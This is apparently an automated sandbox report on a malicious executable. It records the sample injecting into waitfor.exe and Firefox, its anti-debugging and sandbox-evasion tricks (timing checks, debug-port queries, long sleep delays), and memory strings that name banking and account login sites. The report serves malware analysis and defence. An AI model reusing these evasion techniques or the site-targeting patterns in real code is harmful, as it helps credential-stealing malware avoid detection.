Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_0082E045 pushfd ; retn 1E1Fh 7_2_0082E072
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_008261D0 push ebp; ret 7_2_00826220
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_0082C402 push edi; iretd 7_2_0082C41C
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_0082C410 push edi; iretd 7_2_0082C41C
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_0081271D push ds; iretd 7_2_0081271E
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_00830B17 pushad ; retf 7_2_00830B18
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_00826C95 push ebp; ret 7_2_00826C96
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_00830C9B push edx; retf 7_2_00830C9C
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_00830C25 push cs; ret 7_2_00830C89
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_00823270 push FFFFFFBEh; retf 7_2_008232BA
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_00831320 pushfd ; iretd 7_2_00831321
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_0082F5C0 push es; ret 7_2_0082F63B
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_008238A7 push esp; iretd 7_2_008238A8
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_0081DA40 push 20634F79h; retf 7_2_0081DA84
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_04AB44B3 push esp; retf 7_2_04AB44B5
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_04AB5075 push ss; iretd 7_2_04AB5088
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_04AC5242 push eax; ret 7_2_04AC5244
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_04AB6252 pushfd ; retf 7_2_04AB625D
Source: C:\Windows\SysWOW64\waitfor.exe; Code function: 7_2_04AB4F98 push ss; iretd 7_2_04AB5088
Source: suBpo1g13Q.exe; Static PE information: section name: .text entropy: 7.260788180397824
Source: C:\Users\user\Desktop\suBpo1g13Q.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\waitfor.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: suBpo1g13Q.exe PID: 7188, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\waitfor.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Memory allocated: 2960000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Memory allocated: 2B20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Memory allocated: 4B20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Memory allocated: 9130000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Memory allocated: A130000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Memory allocated: A350000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Memory allocated: B350000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014E096E rdtsc 4_2_014E096E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\waitfor.exe -- Window / User API: threadDelayed 2186
Source: C:\Windows\SysWOW64\waitfor.exe -- Window / User API: threadDelayed 7785
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- API coverage: 0.8 %
Source: C:\Windows\SysWOW64\waitfor.exe -- API coverage: 2.6 %
Source: C:\Users\user\Desktop\suBpo1g13Q.exe TID: 7264 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\waitfor.exe TID: 8028 -- Thread sleep count: 2186 > 30
Source: C:\Windows\SysWOW64\waitfor.exe TID: 8028 -- Thread sleep time: -4372000s >= -30000s
Source: C:\Windows\SysWOW64\waitfor.exe TID: 8028 -- Thread sleep count: 7785 > 30
Source: C:\Windows\SysWOW64\waitfor.exe TID: 8028 -- Thread sleep time: -15570000s >= -30000s
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe TID: 7140 -- Thread sleep time: -55000s >= -30000s
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe TID: 7140 -- Thread sleep count: 33 > 30
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe TID: 7140 -- Thread sleep time: -49500s >= -30000s
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe TID: 7140 -- Thread sleep count: 33 > 30
Source: C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe TID: 7140 -- Thread sleep time: -33000s >= -30000s
Source: C:\Windows\SysWOW64\waitfor.exe -- Last function: Thread delayed
Source: C:\Windows\SysWOW64\waitfor.exe -- Last function: Thread delayed
Source: C:\Windows\SysWOW64\waitfor.exe -- Code function: 7_2_0082CB90 FindFirstFileW,FindNextFileW,FindClose, 7_2_0082CB90
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Thread delayed: delay time: 922337203685477
Source: FxK39HI69.7.dr -- Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: FxK39HI69.7.dr -- Binary or memory string: tasks.office.comVMware20,11696501413o
Source: FxK39HI69.7.dr -- Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: FxK39HI69.7.dr -- Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: iBkWOgpZKSoi.exe, 00000008.00000002.3809595361.00000000009EF000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: FxK39HI69.7.dr -- Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: FxK39HI69.7.dr -- Binary or memory string: dev.azure.comVMware20,11696501413j
Source: FxK39HI69.7.dr -- Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: FxK39HI69.7.dr -- Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: FxK39HI69.7.dr -- Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: FxK39HI69.7.dr -- Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: FxK39HI69.7.dr -- Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: FxK39HI69.7.dr -- Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: FxK39HI69.7.dr -- Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: FxK39HI69.7.dr -- Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1954223503.000001CFC1AEC000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: FxK39HI69.7.dr -- Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: FxK39HI69.7.dr -- Binary or memory string: outlook.office.comVMware20,11696501413s
Source: FxK39HI69.7.dr -- Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: FxK39HI69.7.dr -- Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: FxK39HI69.7.dr -- Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: FxK39HI69.7.dr -- Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: FxK39HI69.7.dr -- Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: FxK39HI69.7.dr -- Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: FxK39HI69.7.dr -- Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: FxK39HI69.7.dr -- Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: FxK39HI69.7.dr -- Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: FxK39HI69.7.dr -- Binary or memory string: global block list test formVMware20,11696501413
Source: FxK39HI69.7.dr -- Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: FxK39HI69.7.dr -- Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: FxK39HI69.7.dr -- Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: FxK39HI69.7.dr -- Binary or memory string: discord.comVMware20,11696501413f
Source: FxK39HI69.7.dr -- Binary or memory string: AMC password management pageVMware20,11696501413
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Process queried: DebugPort
Source: C:\Windows\SysWOW64\waitfor.exe -- Process queried: DebugPort
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014E096E rdtsc 4_2_014E096E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_00418073 LdrLoadDll, 4_2_00418073
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01538158 mov eax, dword ptr fs:[00000030h] 4_2_01538158
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01534144 mov eax, dword ptr fs:[00000030h] 4_2_01534144
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01534144 mov eax, dword ptr fs:[00000030h] 4_2_01534144
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01534144 mov ecx, dword ptr fs:[00000030h] 4_2_01534144
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01534144 mov eax, dword ptr fs:[00000030h] 4_2_01534144
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01534144 mov eax, dword ptr fs:[00000030h] 4_2_01534144
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A6154 mov eax, dword ptr fs:[00000030h] 4_2_014A6154
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A6154 mov eax, dword ptr fs:[00000030h] 4_2_014A6154
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149C156 mov eax, dword ptr fs:[00000030h] 4_2_0149C156
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01574164 mov eax, dword ptr fs:[00000030h] 4_2_01574164
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01574164 mov eax, dword ptr fs:[00000030h] 4_2_01574164
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01560115 mov eax, dword ptr fs:[00000030h] 4_2_01560115
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154A118 mov ecx, dword ptr fs:[00000030h] 4_2_0154A118
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154A118 mov eax, dword ptr fs:[00000030h] 4_2_0154A118
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154A118 mov eax, dword ptr fs:[00000030h] 4_2_0154A118
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154A118 mov eax, dword ptr fs:[00000030h] 4_2_0154A118
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h] 4_2_0154E10E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E10E mov ecx, dword ptr fs:[00000030h] 4_2_0154E10E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h] 4_2_0154E10E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h] 4_2_0154E10E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E10E mov ecx, dword ptr fs:[00000030h] 4_2_0154E10E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h] 4_2_0154E10E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h] 4_2_0154E10E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E10E mov ecx, dword ptr fs:[00000030h] 4_2_0154E10E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E10E mov eax, dword ptr fs:[00000030h] 4_2_0154E10E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E10E mov ecx, dword ptr fs:[00000030h] 4_2_0154E10E
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014D0124 mov eax, dword ptr fs:[00000030h] 4_2_014D0124
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0151E1D0 mov eax, dword ptr fs:[00000030h] 4_2_0151E1D0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0151E1D0 mov eax, dword ptr fs:[00000030h] 4_2_0151E1D0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0151E1D0 mov ecx, dword ptr fs:[00000030h] 4_2_0151E1D0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0151E1D0 mov eax, dword ptr fs:[00000030h] 4_2_0151E1D0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0151E1D0 mov eax, dword ptr fs:[00000030h] 4_2_0151E1D0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015661C3 mov eax, dword ptr fs:[00000030h] 4_2_015661C3
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015661C3 mov eax, dword ptr fs:[00000030h] 4_2_015661C3
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015761E5 mov eax, dword ptr fs:[00000030h] 4_2_015761E5
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014D01F8 mov eax, dword ptr fs:[00000030h] 4_2_014D01F8
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014E0185 mov eax, dword ptr fs:[00000030h] 4_2_014E0185
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0152019F mov eax, dword ptr fs:[00000030h] 4_2_0152019F
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0152019F mov eax, dword ptr fs:[00000030h] 4_2_0152019F
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0152019F mov eax, dword ptr fs:[00000030h] 4_2_0152019F
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0152019F mov eax, dword ptr fs:[00000030h] 4_2_0152019F
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01544180 mov eax, dword ptr fs:[00000030h] 4_2_01544180
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01544180 mov eax, dword ptr fs:[00000030h] 4_2_01544180
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0155C188 mov eax, dword ptr fs:[00000030h] 4_2_0155C188
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0155C188 mov eax, dword ptr fs:[00000030h] 4_2_0155C188
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149A197 mov eax, dword ptr fs:[00000030h] 4_2_0149A197
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149A197 mov eax, dword ptr fs:[00000030h] 4_2_0149A197
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149A197 mov eax, dword ptr fs:[00000030h] 4_2_0149A197
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01526050 mov eax, dword ptr fs:[00000030h] 4_2_01526050
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A2050 mov eax, dword ptr fs:[00000030h] 4_2_014A2050
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014CC073 mov eax, dword ptr fs:[00000030h] 4_2_014CC073
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01524000 mov ecx, dword ptr fs:[00000030h] 4_2_01524000
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01542000 mov eax, dword ptr fs:[00000030h] 4_2_01542000
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01542000 mov eax, dword ptr fs:[00000030h] 4_2_01542000
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01542000 mov eax, dword ptr fs:[00000030h] 4_2_01542000
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01542000 mov eax, dword ptr fs:[00000030h] 4_2_01542000
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01542000 mov eax, dword ptr fs:[00000030h] 4_2_01542000
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01542000 mov eax, dword ptr fs:[00000030h] 4_2_01542000
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01542000 mov eax, dword ptr fs:[00000030h] 4_2_01542000
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01542000 mov eax, dword ptr fs:[00000030h] 4_2_01542000
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014BE016 mov eax, dword ptr fs:[00000030h] 4_2_014BE016
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014BE016 mov eax, dword ptr fs:[00000030h] 4_2_014BE016
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014BE016 mov eax, dword ptr fs:[00000030h] 4_2_014BE016
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014BE016 mov eax, dword ptr fs:[00000030h] 4_2_014BE016
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01536030 mov eax, dword ptr fs:[00000030h] 4_2_01536030
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149A020 mov eax, dword ptr fs:[00000030h] 4_2_0149A020
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149C020 mov eax, dword ptr fs:[00000030h] 4_2_0149C020
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015220DE mov eax, dword ptr fs:[00000030h] 4_2_015220DE
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A80E9 mov eax, dword ptr fs:[00000030h] 4_2_014A80E9
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149A0E3 mov ecx, dword ptr fs:[00000030h] 4_2_0149A0E3
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015260E0 mov eax, dword ptr fs:[00000030h] 4_2_015260E0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149C0F0 mov eax, dword ptr fs:[00000030h] 4_2_0149C0F0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014E20F0 mov ecx, dword ptr fs:[00000030h] 4_2_014E20F0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A208A mov eax, dword ptr fs:[00000030h] 4_2_014A208A
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014980A0 mov eax, dword ptr fs:[00000030h] 4_2_014980A0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015660B8 mov eax, dword ptr fs:[00000030h] 4_2_015660B8
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015660B8 mov ecx, dword ptr fs:[00000030h] 4_2_015660B8
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015380A8 mov eax, dword ptr fs:[00000030h] 4_2_015380A8
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0156A352 mov eax, dword ptr fs:[00000030h] 4_2_0156A352
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01548350 mov ecx, dword ptr fs:[00000030h] 4_2_01548350
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0152035C mov eax, dword ptr fs:[00000030h] 4_2_0152035C
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0152035C mov eax, dword ptr fs:[00000030h] 4_2_0152035C
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0152035C mov eax, dword ptr fs:[00000030h] 4_2_0152035C
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0152035C mov ecx, dword ptr fs:[00000030h] 4_2_0152035C
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0152035C mov eax, dword ptr fs:[00000030h] 4_2_0152035C
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0152035C mov eax, dword ptr fs:[00000030h] 4_2_0152035C
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0157634F mov eax, dword ptr fs:[00000030h] 4_2_0157634F
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01522349 mov eax, dword ptr fs:[00000030h] 4_2_01522349
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154437C mov eax, dword ptr fs:[00000030h] 4_2_0154437C
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014DA30B mov eax, dword ptr fs:[00000030h] 4_2_014DA30B
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014DA30B mov eax, dword ptr fs:[00000030h] 4_2_014DA30B
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014DA30B mov eax, dword ptr fs:[00000030h] 4_2_014DA30B
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0149C310 mov ecx, dword ptr fs:[00000030h] 4_2_0149C310
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014C0310 mov ecx, dword ptr fs:[00000030h] 4_2_014C0310
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01578324 mov eax, dword ptr fs:[00000030h] 4_2_01578324
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01578324 mov ecx, dword ptr fs:[00000030h] 4_2_01578324
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01578324 mov eax, dword ptr fs:[00000030h] 4_2_01578324
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_01578324 mov eax, dword ptr fs:[00000030h] 4_2_01578324
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015443D4 mov eax, dword ptr fs:[00000030h] 4_2_015443D4
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_015443D4 mov eax, dword ptr fs:[00000030h] 4_2_015443D4
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h] 4_2_014AA3C0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h] 4_2_014AA3C0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h] 4_2_014AA3C0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h] 4_2_014AA3C0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h] 4_2_014AA3C0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014AA3C0 mov eax, dword ptr fs:[00000030h] 4_2_014AA3C0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A83C0 mov eax, dword ptr fs:[00000030h] 4_2_014A83C0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A83C0 mov eax, dword ptr fs:[00000030h] 4_2_014A83C0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A83C0 mov eax, dword ptr fs:[00000030h] 4_2_014A83C0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014A83C0 mov eax, dword ptr fs:[00000030h] 4_2_014A83C0
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E3DB mov eax, dword ptr fs:[00000030h] 4_2_0154E3DB
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E3DB mov eax, dword ptr fs:[00000030h] 4_2_0154E3DB
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E3DB mov ecx, dword ptr fs:[00000030h] 4_2_0154E3DB
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0154E3DB mov eax, dword ptr fs:[00000030h] 4_2_0154E3DB
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_0155C3CD mov eax, dword ptr fs:[00000030h] 4_2_0155C3CD
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h] 4_2_014B03E9
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h] 4_2_014B03E9
Source: C:\Users\user\Desktop\suBpo1g13Q.exe -- Code function: 4_2_014B03E9 mov eax, dword ptr fs:[00000030h] 4_2_014B03E9
